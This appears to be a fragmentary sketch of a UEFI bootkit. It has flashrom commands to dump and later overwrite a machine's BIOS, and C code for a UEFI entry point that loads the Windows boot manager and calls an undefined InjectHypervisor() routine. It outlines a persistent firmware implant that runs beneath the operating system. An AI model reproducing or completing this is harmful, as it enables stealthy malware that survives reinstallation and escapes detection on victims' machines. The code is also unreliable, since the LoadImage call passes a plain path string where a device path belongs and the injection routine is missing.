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sudo flashrom -p internal -r bios_backup.bin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uefi-firmware-parser bios_backup.bin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EFI_STATUS EFIAPI UefiMain(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable) 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InitializeLib(ImageHandle, SystemTable);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CHAR16 *BootLoader = L"\\EFI\\Microsoft\\Boot\\bootmgfw.efi";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SystemTable-&gt;BootServices-&gt;LoadImage(FALSE, ImageHandle, BootLoader, NULL, 0, NULL);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InjectHypervisor();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return EFI_SUCCESS;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sudo flashrom -p internal -w modified_bios.bin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